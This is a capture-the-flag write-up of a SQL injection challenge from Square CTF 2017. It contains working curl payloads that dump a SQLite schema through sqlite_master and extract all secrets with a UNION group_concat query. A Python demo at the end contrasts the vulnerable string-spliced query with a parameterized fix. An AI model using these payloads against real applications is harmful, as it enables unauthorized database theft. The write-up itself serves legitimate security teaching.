Archive for October, 2017

Write-up: Little Doggy Tables, Square CTF 2017

This is a write-up for the challenge Little Doggy Tables from Square CTF 2017.

The challenge can be found here: https://squarectf.com/challenges/little-doggy-tables

The challenge requires us to use SQL injection to extract the flag from a table in the database.

On running this command:

curl -k "https://little-doggy-tables.capturethesquare.com/agent_lookup" --get --data-urlencode "codename=Fido"

I got the following output:

dog

This means I can run SQL queries through this command.

The challenge details also include the source code, which looks like this:

From the source code it is clear that SQL injection is possible and that the database is SQLite3.

To check if it was working, I ran:

curl -k "https://little-doggy-tables.capturethesquare.com/agent_lookup" --get --data-urlencode "codename='"

Which gave this output:

Internal Server Error

unrecognized token: "'\";"

WEBrick/1.3.1 (Ruby/2.3.4/2017-03-30) at little-doggy-tables.capturethesquare.com:443

Now that I knew SQL injection was working, I had to access the metadata. Unfortunately, information_schema does not exist here since the database is SQLite and not MySQL. I searched for an equivalent in SQLite and came across this question on Stack Overflow:

https://stackoverflow.com/questions/6460671/sqlite-schema-information-metadata#6617764

This gave me enough to realize that sqlite_master is the information_schema equivalent in SQLite. I adapted the commands from the answer to suit my search.

All metadata in SQLite can be read simply with the query:

select sql from sqlite_master

So I modified my payload to:

curl -k "https://little-doggy-tables.capturethesquare.com/agent_lookup" --get --data-urlencode "codename=' union select sql from sqlite_master-- -"

Which gave the output:

CREATE TABLE operatives (
codename TEXT,
species TEXT,
secret TEXT
)

Now we know both the name of the table and the name of the required column, which is obviously secret. The SQL query that now needs to be executed is:

select group_concat(secret) from operatives

The corresponding payload would be:

curl -k "https://little-doggy-tables.capturethesquare.com/agent_lookup" --get --data-urlencode "codename=' union select group_concat(secret) from operatives-- -"

The resulting output:

e5fa44f2b31c1fb553b6021e7360d07d5d91ff5e,7448d8798a4380162d4b56f9b452e2f6f9e24e7a,9c6b057a2b9d96a4067a749ee3b3b0158d390cf1,5d9474c0309b7ca09a182d888f73b37a8fe1362c,flag-a3db5c13ff90a36963278c6a39e4ee3c22e2a436,ccf271b7830882da1791852baeca1737fcbe4b90,d3964f9dad9f60363c81b688324d95b4ec7c8038,136571b4

Picking the flag out of the above output, we get:

flag-a3db5c13ff90a36963278c6a39e4ee3c22e2a436
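To show the defect and its fix side by side, here is an added Python example (not the challenge's Ruby source, which this post does not reproduce) that rebuilds the operatives table from the schema dump above with constructed rows and runs the post's two payloads against a string-spliced query and a parameterized one. The single-row fetch is an assumption about how the challenge app behaved, made because the sqlite_master dump came back as one CREATE TABLE statement.

```python
import sqlite3

# Stand-in database: schema copied from the write-up's sqlite_master dump,
# rows and secrets are constructed for this example.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE operatives (codename TEXT, species TEXT, secret TEXT)")
    conn.executemany("INSERT INTO operatives VALUES (?, ?, ?)", [
        ("Fido", "dog", "flag-PLACEHOLDER"),
        ("Felix", "cat", "not-a-flag"),
    ])
    return conn

DB = build_db()

# The write-up's two payloads, reused verbatim.
SCHEMA_PAYLOAD = "' union select sql from sqlite_master-- -"
SECRETS_PAYLOAD = "' union select group_concat(secret) from operatives-- -"

def lookup_vulnerable(codename, conn=DB):
    """Assumed shape of the challenge's lookup: the codename is spliced into
    the SQL text and only the first row is returned (hence one CREATE TABLE
    line in the dump, and group_concat to squeeze every secret into one row)."""
    sql = f"SELECT species FROM operatives WHERE codename = '{codename}'"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def lookup_safe(codename, conn=DB):
    """Fix: bind the codename as a parameter so SQLite never parses it as SQL."""
    sql = "SELECT species FROM operatives WHERE codename = ?"
    row = conn.execute(sql, (codename,)).fetchone()
    return row[0] if row else None

def probe_error(codename, conn=DB):
    """Return the SQLite error text the vulnerable query leaks for an input,
    or None. A lone quote reproduces the 'unrecognized token' error that
    confirmed the injection in the write-up; a 500 page that echoes this text
    is the signal to look for in server logs."""
    try:
        lookup_vulnerable(codename, conn)
    except sqlite3.OperationalError as e:
        return str(e)
    return None

if __name__ == "__main__":
    print(probe_error("'"))                     # unrecognized token: "'"
    print(lookup_vulnerable(SCHEMA_PAYLOAD))    # CREATE TABLE operatives (codename TEXT, ...
    print(lookup_vulnerable(SECRETS_PAYLOAD))   # flag-PLACEHOLDER,not-a-flag
    print(lookup_safe(SCHEMA_PAYLOAD))          # None
```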